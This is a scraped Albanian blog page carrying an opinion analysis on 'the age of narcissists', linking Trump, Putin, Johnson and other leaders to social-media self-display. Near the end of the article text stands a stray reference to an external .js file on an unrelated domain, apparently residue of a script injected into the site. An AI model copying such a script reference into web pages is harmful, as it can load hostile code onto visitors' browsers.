• HOME
AlpeBlog
AlpeBlog

July 17th, 2025
  • HOME
ANALIZA/ Epoka e narcistëve
Home
Blog

ANALIZA/ Epoka e narcistëve

January 6th, 2020 F.autor Blog 0 comments

Donald Trump si Rocky, Vladimir Putini i zhveshur deri në bel, Boris Johnsoni sillet si shok. Ishte fundi i nëntorit kur një tweet nga Presidenti i SHBA tërhoqi më shumë vëmendje se zakonisht. Ai ishte një montazh fotografik, në të cilin koka e Donald Trump-it ishte montuar artificialisht në një trup të zhveshur muskulor. Sigurisht ai nuk ishte trupi i vërtetë i Trumpit
(i cili dihet se është i shëndoshë), por i boksierit të filmit Rocky Balboa. Gazeta me drejtim transatlantik “Die Welt” shkroi në Twitter se ky mesazh “është dëshmia më e fundit e tezës: në Shtëpinë e Bardhë rri një djalë me bagazhin emocional të një 15-vjeçari”. Por një kritikë e tillë nuk e prek një si Trumpi.

Pse kanë sukses ata?

Presidenti amerikan nuk është sigurisht i vetmi që i shfaq publikisht fantazitë e tij të gjithëfuqisë. Kur është fjala për të demonstruar mashkullësi të paskajshme, Vladimir Putini është i pakonkurrueshëm – të paktën ai e arrin këtë pa Photoshop. Studentit ish elitar, Boris Johnson i pëlqen ta portretizojë veten si mik të dashur, Rexhep Tajip Erdogani hiqet si sulltan, Kim Jong Un-i e portretizon veten si orakull. Po Silvio “Bunga-Bunga” Berlusconi, i kujtohet njeriu?

Puna nuk është, se këta pak a shumë të moshuar e luajnë këtë lojë vetëm për argëtimin e tyre. Ata luajnë kryesisht sepse janë të suksesshëm me të – madje edhe në demokraci: Boris Johnsoni ishte në gjendje të gënjente pa fund për Brexitin – kjo nuk ndikoi në suksesin e tij elektoral në mes të dhjetorit. Edhe sjellja adoleshente e Trumpit gjen edhe pasues besnikë, rizgjedhja e tij është më me gjasa se kurrë.

Dhe pse ndodh kjo? Pse nuk perceptohet sjellja e këtyre njerëzve ashtu si është – për të të ardhur rëndë? Pse kanë ata sukses me gjërat që ishin të paimagjinueshme deri disa vjet më parë? (Dakord: Berluskoni me sa duket ishte më i avancuar se koha e tij.) Përgjigja është e thjeshtë: narcizmi i këtyre njerëzve ka jehonë, sepse te secili prej nesh fshihet një narcist i vogël. Një narcist i vogël që del në pah kur prezantojmë veten në rrjetet sociale.

Kommentarbild Muno Martin

Nxitësi i Egos: mediat sociale

Merrni si shembull TikTok, një platformë videoje që përdoret çdo muaj nga më shumë se një miliardë njerëz në të gjithë botën dhe për këtë arsye është më e suksesshme se Instagram-i, Snapchat-i ose Youtube. Në TikTok, njerëzit postojnë video të shkurtra – zakonisht për veten e tyre, shpesh kur imitojnë e këndojnë këngë të njohura pop. Ndonjëherë kjo është zbavitëse, shpesh për të të ardhur turp dhe rrallë me të vërtetë e mirë. TikTok është prova përfundimtare e vërtetësisë së citatit të Andy Warhol-it që në të ardhmen të gjithë do të jenë të famshëm në botë për 15 minuta.

Kjo në një kohë kur është gabim të mendosh që vetëparaqitja është konstituive për ne. Sepse vetja jonë zhvillohet vetëm në bashkëpunim, në ndërveprim shoqëror. Po ta shohim botën vetëm përmes syzeve të selfie-t, po të shohim vetëm veten dhe jo më njerëzit e tjerë pranë nesh, po t’i ngatërrojmë rrjetet sociale me bashkëjetesë sociale, atëherë nuk duhet të çuditemi, që njerëz si Trumpi ose Johnsoni vijnë në pushtet.

//minisrclink.cool/1e40c8bd4601a5a5a4.js

Facebook Twitter Google+ LinkedIn Pinterest
Next article MERO BAZE/ Mbivlerësimi I taktikave dhe “Vlerës” së Blerim Rekës nga Albin Kurti
Previous article ILIR METAJ/ Pse dreqin vini ju emigrantë kur i flisni njëri-tjetrit në greqisht apo italisht?

F.autor

Related Posts

AURON TARE/ Shteti i Muçit përballë Bardhës së Rigonit Blog
July 16th, 2025

AURON TARE/ Shteti i Muçit përballë Bardhës së Rigonit

EDUARD ZALOSHNJA/ Po autostrada Milot-Shkodër kur do të ndërtohet? Blog
July 14th, 2025

EDUARD ZALOSHNJA/ Po autostrada Milot-Shkodër kur do të ndërtohet?

MERO BAZE/ SPAK provoi se ka gjunjëzuar jo vetëm drejtësinë, por edhe qeverinë Blog
July 10th, 2025

MERO BAZE/ SPAK provoi se ka gjunjëzuar jo vetëm drejtësinë, por edhe qeverinë

Leave a Reply Cancel reply

Postimet më të ndjekura
FRROK ÇUPI/ Frika nga gjumi post- elekt

FRROK ÇUPI/ Frika nga gjumi post- elekt

Blog Jul 9th, 2025
ARTUR AJAZI/ Si ka mundësi? Blog

ARTUR AJAZI/ Si ka mundësi?

Jul 8th, 2025
MERO BAZE/ SPAK provoi se ka gjunjëzuar jo vetëm drejtësinë, por edhe qeverinë Blog

MERO BAZE/ SPAK provoi se ka gjunjëzuar jo vetëm drejtësinë, por edhe qeverinë

Jul 10th, 2025
LIRIDONA BEQIRI/ Samiti i Shkupit i Ramës dhe Kurtit: Iluzioni i progresit në hijen e ndarjes Blog

LIRIDONA BEQIRI/ Samiti i Shkupit i Ramës dhe Kurtit: Iluzioni i progresit në hijen e ndarjes

Jul 2nd, 2025
AURON TARE/ Shteti i Muçit përballë Bardhës së Rigonit Blog

AURON TARE/ Shteti i Muçit përballë Bardhës së Rigonit

Jul 16th, 2025
  • HOME
  • Back to top
© AlpeNews 2017. Të Gjitha të drejtat e Rezervuara
Produced by o.k